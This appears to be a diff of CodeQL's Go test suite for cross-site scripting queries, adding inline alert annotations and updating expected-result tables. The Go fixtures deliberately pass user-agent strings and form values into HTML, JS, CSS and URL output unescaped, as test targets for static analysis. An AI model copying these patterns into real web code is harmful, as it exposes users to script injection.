| HTMLTemplateEscapingPassthrough.go:92:38:92:46 | converted | semmle.label | converted |
|
||||
subpaths
|
||||
@@ -1,2 +0,0 @@
|
||||
query: experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql
|
||||
postprocess: utils/test/PrettyPrintModels.ql
|
||||
@@ -0,0 +1,60 @@
|
||||
#select
|
||||
| HtmlTemplateEscapingBypassXss.go:28:39:28:39 | a | HtmlTemplateEscapingBypassXss.go:27:26:27:40 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:28:39:28:39 | a | Data from an $@ will not be auto-escaped because it was converted to template.HTML | HtmlTemplateEscapingBypassXss.go:27:26:27:40 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:34:40:34:40 | a | HtmlTemplateEscapingBypassXss.go:33:23:33:37 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:34:40:34:40 | a | Data from an $@ will not be auto-escaped because it was converted to template.HTML | HtmlTemplateEscapingBypassXss.go:33:23:33:37 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:39:40:39:40 | a | HtmlTemplateEscapingBypassXss.go:38:19:38:33 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:39:40:39:40 | a | Data from an $@ will not be auto-escaped because it was converted to template.HTML | HtmlTemplateEscapingBypassXss.go:38:19:38:33 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:45:41:45:41 | c | HtmlTemplateEscapingBypassXss.go:44:29:44:43 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:45:41:45:41 | c | Data from an $@ will not be auto-escaped because it was converted to template.HTMLAttr | HtmlTemplateEscapingBypassXss.go:44:29:44:43 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:49:44:49:44 | d | HtmlTemplateEscapingBypassXss.go:48:23:48:37 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:49:44:49:44 | d | Data from an $@ will not be auto-escaped because it was converted to template.JS | HtmlTemplateEscapingBypassXss.go:48:23:48:37 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:53:44:53:44 | e | HtmlTemplateEscapingBypassXss.go:52:26:52:40 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:53:44:53:44 | e | Data from an $@ will not be auto-escaped because it was converted to template.JSStr | HtmlTemplateEscapingBypassXss.go:52:26:52:40 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:57:38:57:38 | b | HtmlTemplateEscapingBypassXss.go:56:24:56:38 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:57:38:57:38 | b | Data from an $@ will not be auto-escaped because it was converted to template.CSS | HtmlTemplateEscapingBypassXss.go:56:24:56:38 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:61:44:61:44 | f | HtmlTemplateEscapingBypassXss.go:60:27:60:41 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:61:44:61:44 | f | Data from an $@ will not be auto-escaped because it was converted to template.Srcset | HtmlTemplateEscapingBypassXss.go:60:27:60:41 | call to UserAgent | untrusted source |
|
||||
| HtmlTemplateEscapingBypassXss.go:65:38:65:38 | g | HtmlTemplateEscapingBypassXss.go:64:24:64:38 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:65:38:65:38 | g | Data from an $@ will not be auto-escaped because it was converted to template.URL | HtmlTemplateEscapingBypassXss.go:64:24:64:38 | call to UserAgent | untrusted source |
|
||||
edges
|
||||
| HtmlTemplateEscapingBypassXss.go:27:12:27:41 | type conversion | HtmlTemplateEscapingBypassXss.go:28:39:28:39 | a | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:27:26:27:40 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:27:12:27:41 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:33:9:33:38 | type conversion | HtmlTemplateEscapingBypassXss.go:34:40:34:40 | a | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:33:23:33:37 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:33:9:33:38 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:38:9:38:34 | type conversion | HtmlTemplateEscapingBypassXss.go:39:40:39:40 | a | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:38:19:38:33 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:38:9:38:34 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:44:11:44:44 | type conversion | HtmlTemplateEscapingBypassXss.go:45:41:45:41 | c | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:44:29:44:43 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:44:11:44:44 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:48:11:48:38 | type conversion | HtmlTemplateEscapingBypassXss.go:49:44:49:44 | d | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:48:23:48:37 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:48:11:48:38 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:52:11:52:41 | type conversion | HtmlTemplateEscapingBypassXss.go:53:44:53:44 | e | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:52:26:52:40 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:52:11:52:41 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:56:11:56:39 | type conversion | HtmlTemplateEscapingBypassXss.go:57:38:57:38 | b | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:56:24:56:38 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:56:11:56:39 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:60:11:60:42 | type conversion | HtmlTemplateEscapingBypassXss.go:61:44:61:44 | f | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:60:27:60:41 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:60:11:60:42 | type conversion | provenance | Src:MaD:1 Config |
|
||||
| HtmlTemplateEscapingBypassXss.go:64:11:64:39 | type conversion | HtmlTemplateEscapingBypassXss.go:65:38:65:38 | g | provenance | |
|
||||
| HtmlTemplateEscapingBypassXss.go:64:24:64:38 | call to UserAgent | HtmlTemplateEscapingBypassXss.go:64:11:64:39 | type conversion | provenance | Src:MaD:1 Config |
|
||||
models
|
||||
| 1 | Source: net/http; Request; true; UserAgent; ; ; ReturnValue; remote; manual |
|
||||
nodes
|
||||
| HtmlTemplateEscapingBypassXss.go:27:12:27:41 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:27:26:27:40 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:28:39:28:39 | a | semmle.label | a |
|
||||
| HtmlTemplateEscapingBypassXss.go:33:9:33:38 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:33:23:33:37 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:34:40:34:40 | a | semmle.label | a |
|
||||
| HtmlTemplateEscapingBypassXss.go:38:9:38:34 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:38:19:38:33 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:39:40:39:40 | a | semmle.label | a |
|
||||
| HtmlTemplateEscapingBypassXss.go:44:11:44:44 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:44:29:44:43 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:45:41:45:41 | c | semmle.label | c |
|
||||
| HtmlTemplateEscapingBypassXss.go:48:11:48:38 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:48:23:48:37 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:49:44:49:44 | d | semmle.label | d |
|
||||
| HtmlTemplateEscapingBypassXss.go:52:11:52:41 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:52:26:52:40 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:53:44:53:44 | e | semmle.label | e |
|
||||
| HtmlTemplateEscapingBypassXss.go:56:11:56:39 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:56:24:56:38 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:57:38:57:38 | b | semmle.label | b |
|
||||
| HtmlTemplateEscapingBypassXss.go:60:11:60:42 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:60:27:60:41 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:61:44:61:44 | f | semmle.label | f |
|
||||
| HtmlTemplateEscapingBypassXss.go:64:11:64:39 | type conversion | semmle.label | type conversion |
|
||||
| HtmlTemplateEscapingBypassXss.go:64:24:64:38 | call to UserAgent | semmle.label | call to UserAgent |
|
||||
| HtmlTemplateEscapingBypassXss.go:65:38:65:38 | g | semmle.label | g |
|
||||
subpaths
|
||||
@@ -7,8 +7,6 @@ import (
|
||||
"strconv"
|
||||
)
|
||||
|
||||
func main() {}
|
||||
|
||||
func checkError(err error) {
|
||||
if err != nil {
|
||||
panic(err)
|
||||
@@ -26,45 +24,45 @@ func bad(req *http.Request) {
|
||||
|
||||
{
|
||||
{
|
||||
var a = template.HTML(req.UserAgent())
|
||||
checkError(tmpl.Execute(os.Stdout, a))
|
||||
var a = template.HTML(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmpl.Execute(os.Stdout, a)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
{
|
||||
var a template.HTML
|
||||
a = template.HTML(req.UserAgent())
|
||||
checkError(tmpl.Execute(os.Stdout, a))
|
||||
a = template.HTML(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmpl.Execute(os.Stdout, a)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
var a HTMLAlias
|
||||
a = HTMLAlias(req.UserAgent())
|
||||
checkError(tmpl.Execute(os.Stdout, a))
|
||||
a = HTMLAlias(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmpl.Execute(os.Stdout, a)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
}
|
||||
}
|
||||
{
|
||||
var c = template.HTMLAttr(req.UserAgent())
|
||||
checkError(tmplTag.Execute(os.Stdout, c))
|
||||
var c = template.HTMLAttr(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmplTag.Execute(os.Stdout, c)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
var d = template.JS(req.UserAgent())
|
||||
checkError(tmplScript.Execute(os.Stdout, d))
|
||||
var d = template.JS(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmplScript.Execute(os.Stdout, d)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
var e = template.JSStr(req.UserAgent())
|
||||
checkError(tmplScript.Execute(os.Stdout, e))
|
||||
var e = template.JSStr(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmplScript.Execute(os.Stdout, e)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
var b = template.CSS(req.UserAgent())
|
||||
checkError(tmpl.Execute(os.Stdout, b))
|
||||
var b = template.CSS(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmpl.Execute(os.Stdout, b)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
var f = template.Srcset(req.UserAgent())
|
||||
checkError(tmplSrcset.Execute(os.Stdout, f))
|
||||
var f = template.Srcset(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmplSrcset.Execute(os.Stdout, f)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
{
|
||||
var g = template.URL(req.UserAgent())
|
||||
checkError(tmpl.Execute(os.Stdout, g))
|
||||
var g = template.URL(req.UserAgent()) // $ Source[go/html-template-escaping-bypass-xss]
|
||||
checkError(tmpl.Execute(os.Stdout, g)) // $ Alert[go/html-template-escaping-bypass-xss]
|
||||
}
|
||||
}
|
||||
|
||||
@@ -0,0 +1,4 @@
|
||||
query: Security/CWE-079/HtmlTemplateEscapingBypassXss.ql
|
||||
postprocess:
|
||||
- utils/test/PrettyPrintModels.ql
|
||||
- utils/test/InlineExpectationsTestQuery.ql
|
||||
@@ -30,10 +30,10 @@ edges
|
||||
| contenttype.go:73:10:73:28 | call to FormValue | contenttype.go:79:11:79:14 | data | provenance | Src:MaD:8 |
|
||||
| contenttype.go:88:10:88:28 | call to FormValue | contenttype.go:91:4:91:7 | data | provenance | Src:MaD:8 |
|
||||
| contenttype.go:113:10:113:28 | call to FormValue | contenttype.go:114:50:114:53 | data | provenance | Src:MaD:8 |
|
||||
| reflectedxsstest.go:31:2:31:44 | ... := ...[0] | reflectedxsstest.go:32:34:32:37 | file | provenance | Src:MaD:7 |
|
||||
| reflectedxsstest.go:31:2:31:44 | ... := ...[0] | reflectedxsstest.go:32:30:32:33 | file | provenance | Src:MaD:7 |
|
||||
| reflectedxsstest.go:31:2:31:44 | ... := ...[1] | reflectedxsstest.go:34:46:34:60 | selection of Filename | provenance | Src:MaD:7 |
|
||||
| reflectedxsstest.go:32:2:32:38 | ... := ...[0] | reflectedxsstest.go:33:49:33:55 | content | provenance | |
|
||||
| reflectedxsstest.go:32:34:32:37 | file | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | provenance | MaD:13 |
|
||||
| reflectedxsstest.go:32:2:32:34 | ... := ...[0] | reflectedxsstest.go:33:49:33:55 | content | provenance | |
|
||||
| reflectedxsstest.go:32:30:32:33 | file | reflectedxsstest.go:32:2:32:34 | ... := ...[0] | provenance | MaD:13 |
|
||||
| reflectedxsstest.go:33:17:33:56 | []type{args} [array] | reflectedxsstest.go:33:17:33:56 | call to Sprintf | provenance | MaD:12 |
|
||||
| reflectedxsstest.go:33:17:33:56 | call to Sprintf | reflectedxsstest.go:33:10:33:57 | type conversion | provenance | |
|
||||
| reflectedxsstest.go:33:49:33:55 | content | reflectedxsstest.go:33:17:33:56 | []type{args} [array] | provenance | |
|
||||
@@ -81,7 +81,7 @@ models
|
||||
| 10 | Source: net/http; Request; true; URL; ; ; ; remote; manual |
|
||||
| 11 | Source: nhooyr.io/websocket; Conn; true; Read; ; ; ReturnValue[1]; remote; manual |
|
||||
| 12 | Summary: fmt; ; false; Sprintf; ; ; Argument[1].ArrayElement; ReturnValue; taint; manual |
|
||||
| 13 | Summary: io/ioutil; ; false; ReadAll; ; ; Argument[0]; ReturnValue[0]; taint; manual |
|
||||
| 13 | Summary: io; ; false; ReadAll; ; ; Argument[0]; ReturnValue[0]; taint; manual |
|
||||
| 14 | Summary: io; Reader; true; Read; ; ; Argument[receiver]; Argument[0]; taint; manual |
|
||||
| 15 | Summary: mime/multipart; Part; true; FileName; ; ; Argument[receiver]; ReturnValue; taint; manual |
|
||||
| 16 | Summary: mime/multipart; Reader; true; NextPart; ; ; Argument[receiver]; ReturnValue[0]; taint; manual |
|
||||
@@ -108,8 +108,8 @@ nodes
|
||||
| contenttype.go:114:50:114:53 | data | semmle.label | data |
|
||||
| reflectedxsstest.go:31:2:31:44 | ... := ...[0] | semmle.label | ... := ...[0] |
|
||||
| reflectedxsstest.go:31:2:31:44 | ... := ...[1] | semmle.label | ... := ...[1] |
|
||||
| reflectedxsstest.go:32:2:32:38 | ... := ...[0] | semmle.label | ... := ...[0] |
|
||||
| reflectedxsstest.go:32:34:32:37 | file | semmle.label | file |
|
||||
| reflectedxsstest.go:32:2:32:34 | ... := ...[0] | semmle.label | ... := ...[0] |
|
||||
| reflectedxsstest.go:32:30:32:33 | file | semmle.label | file |
|
||||
| reflectedxsstest.go:33:10:33:57 | type conversion | semmle.label | type conversion |
|
||||
| reflectedxsstest.go:33:17:33:56 | []type{args} [array] | semmle.label | []type{args} [array] |
|
||||
| reflectedxsstest.go:33:17:33:56 | call to Sprintf | semmle.label | call to Sprintf |
|
||||
|
||||
@@ -8,10 +8,10 @@ import (
|
||||
func serve() {
|
||||
http.HandleFunc("/user", func(w http.ResponseWriter, r *http.Request) {
|
||||
r.ParseForm()
|
||||
username := r.Form.Get("username")
|
||||
username := r.Form.Get("username") // $ Source[go/reflected-xss]
|
||||
if !isValidUsername(username) {
|
||||
// BAD: a request parameter is incorporated without validation into the response
|
||||
fmt.Fprintf(w, "%q is an unknown user", username)
|
||||
fmt.Fprintf(w, "%q is an unknown user", username) // $ Alert[go/reflected-xss]
|
||||
} else {
|
||||
// TODO: Handle successful login
|
||||
}
|
||||
|
||||
@@ -1,2 +1,4 @@
|
||||
query: Security/CWE-079/ReflectedXss.ql
|
||||
postprocess: utils/test/PrettyPrintModels.ql
|
||||
postprocess:
|
||||
- utils/test/PrettyPrintModels.ql
|
||||
- utils/test/InlineExpectationsTestQuery.ql
|
||||
|
||||
@@ -1,9 +1,7 @@
|
||||
#select
|
||||
| StoredXss.go:13:21:13:36 | ...+... | StoredXss.go:13:21:13:31 | call to Name | StoredXss.go:13:21:13:36 | ...+... | Stored cross-site scripting vulnerability due to $@. | StoredXss.go:13:21:13:31 | call to Name | stored value |
|
||||
| stored.go:30:22:30:25 | name | stored.go:18:3:18:28 | ... := ...[0] | stored.go:30:22:30:25 | name | Stored cross-site scripting vulnerability due to $@. | stored.go:18:3:18:28 | ... := ...[0] | stored value |
|
||||
| stored.go:61:22:61:25 | path | stored.go:59:30:59:33 | definition of path | stored.go:61:22:61:25 | path | Stored cross-site scripting vulnerability due to $@. | stored.go:59:30:59:33 | definition of path | stored value |
|
||||
edges
|
||||
| StoredXss.go:13:21:13:31 | call to Name | StoredXss.go:13:21:13:36 | ...+... | provenance | |
|
||||
| stored.go:18:3:18:28 | ... := ...[0] | stored.go:25:14:25:17 | rows | provenance | Src:MaD:1 |
|
||||
| stored.go:25:14:25:17 | rows | stored.go:25:29:25:33 | &... | provenance | FunctionModel |
|
||||
| stored.go:25:29:25:33 | &... | stored.go:30:22:30:25 | name | provenance | |
|
||||
@@ -11,8 +9,6 @@ edges
|
||||
models
|
||||
| 1 | Source: database/sql; DB; true; Query; ; ; ReturnValue[0]; database; manual |
|
||||
nodes
|
||||
| StoredXss.go:13:21:13:31 | call to Name | semmle.label | call to Name |
|
||||
| StoredXss.go:13:21:13:36 | ...+... | semmle.label | ...+... |
|
||||
| stored.go:18:3:18:28 | ... := ...[0] | semmle.label | ... := ...[0] |
|
||||
| stored.go:25:14:25:17 | rows | semmle.label | rows |
|
||||
| stored.go:25:29:25:33 | &... | semmle.label | &... |
|
||||
@@ -20,3 +16,5 @@ nodes
|
||||
| stored.go:59:30:59:33 | definition of path | semmle.label | definition of path |
|
||||
| stored.go:61:22:61:25 | path | semmle.label | path |
|
||||
subpaths
|
||||
testFailures
|
||||
| StoredXss.go:13:39:13:63 | comment | Missing result: Alert[go/stored-xss] |
|
||||
|
||||
@@ -2,14 +2,14 @@ package main
|
||||
|
||||
import (
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net/http"
|
||||
"os"
|
||||
)
|
||||
|
||||
func ListFiles(w http.ResponseWriter, r *http.Request) {
|
||||
files, _ := ioutil.ReadDir(".")
|
||||
files, _ := os.ReadDir(".")
|
||||
|
||||
for _, file := range files {
|
||||
io.WriteString(w, file.Name()+"\n")
|
||||
io.WriteString(w, file.Name()+"\n") // $ Alert[go/stored-xss]
|
||||
}
|
||||
}
|
||||
|
||||
@@ -1,2 +1,4 @@
|
||||
query: Security/CWE-079/StoredXss.ql
|
||||
postprocess: utils/test/PrettyPrintModels.ql
|
||||
postprocess:
|
||||
- utils/test/PrettyPrintModels.ql
|
||||
- utils/test/InlineExpectationsTestQuery.ql
|
||||
|
||||
@@ -4,13 +4,13 @@ import (
|
||||
"html"
|
||||
"html/template"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net/http"
|
||||
"os"
|
||||
)
|
||||
|
||||
func ListFiles1(w http.ResponseWriter, r *http.Request) {
|
||||
var template template.Template
|
||||
files, _ := ioutil.ReadDir(".")
|
||||
files, _ := os.ReadDir(".")
|
||||
|
||||
for _, file := range files {
|
||||
io.WriteString(w, html.EscapeString(file.Name())+"\n")
|
||||
|
||||
@@ -8,13 +8,13 @@ import (
|
||||
func serve2() {
|
||||
http.HandleFunc("/echo", func(w http.ResponseWriter, r *http.Request) {
|
||||
r.ParseForm()
|
||||
data := r.Form.Get("data")
|
||||
data := r.Form.Get("data") // $ Source[go/reflected-xss]
|
||||
|
||||
// Not OK; direct flow from request body to output.
|
||||
// The response Content-Type header is derived from a call to
|
||||
// `http.DetectContentType`, which can be easily manipulated into returning
|
||||
// `text/html` for XSS.
|
||||
w.Write([]byte(data))
|
||||
w.Write([]byte(data)) // $ Alert[go/reflected-xss]
|
||||
})
|
||||
http.ListenAndServe(":80", nil)
|
||||
}
|
||||
@@ -46,11 +46,11 @@ func serve4() {
|
||||
func serve5() {
|
||||
http.HandleFunc("/echo", func(w http.ResponseWriter, r *http.Request) {
|
||||
r.ParseForm()
|
||||
data := r.Form.Get("data")
|
||||
data := r.Form.Get("data") // $ Source[go/reflected-xss]
|
||||
|
||||
w.Header().Set("Content-Type", "text/html")
|
||||
|
||||
fmt.Fprintf(w, "Constant: %s", data) // Not OK; the content-type header is explicitly set to html
|
||||
fmt.Fprintf(w, "Constant: %s", data) // $ Alert[go/reflected-xss] // The content-type header is explicitly set to html
|
||||
})
|
||||
http.ListenAndServe(":80", nil)
|
||||
}
|
||||
@@ -60,8 +60,8 @@ func serve10() {
|
||||
r.ParseForm()
|
||||
data := r.Form.Get("data")
|
||||
|
||||
data = r.FormValue("data")
|
||||
fmt.Fprintf(w, "\t<html><body>%s</body></html>", data) // Not OK
|
||||
data = r.FormValue("data") // $ Source[go/reflected-xss]
|
||||
fmt.Fprintf(w, "\t<html><body>%s</body></html>", data) // $ Alert[go/reflected-xss]
|
||||
})
|
||||
}
|
||||
|
||||
@@ -70,13 +70,13 @@ func serve11() {
|
||||
r.ParseForm()
|
||||
data := r.Form.Get("data")
|
||||
|
||||
data = r.FormValue("data")
|
||||
data = r.FormValue("data") // $ Source[go/reflected-xss]
|
||||
fmt.Fprintf(w, `
|
||||
<html>
|
||||
<body>
|
||||
%s
|
||||
</body>
|
||||
</html>`, data) // Not OK
|
||||
</html>`, data) // $ Alert[go/reflected-xss]
|
||||
})
|
||||
}
|
||||
|
||||
@@ -85,10 +85,10 @@ func serve12() {
|
||||
r.ParseForm()
|
||||
data := r.Form.Get("data")
|
||||
|
||||
data = r.FormValue("data")
|
||||
data = r.FormValue("data") // $ Source[go/reflected-xss]
|
||||
fmt.Fprintf(w, `
|
||||
%s
|
||||
`, data) // Not OK
|
||||
`, data) // $ Alert[go/reflected-xss]
|
||||
})
|
||||
}
|
||||
|
||||
@@ -110,7 +110,7 @@ func serve14() {
|
||||
r.ParseForm()
|
||||
data := r.Form.Get("data")
|
||||
|
||||
data = r.FormValue("data")
|
||||
fmt.Fprintf(w, "<html><body>%s</body></html>", data) // Not OK
|
||||
data = r.FormValue("data") // $ Source[go/reflected-xss]
|
||||
fmt.Fprintf(w, "<html><body>%s</body></html>", data) // $ Alert[go/reflected-xss]
|
||||
})
|
||||
}
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user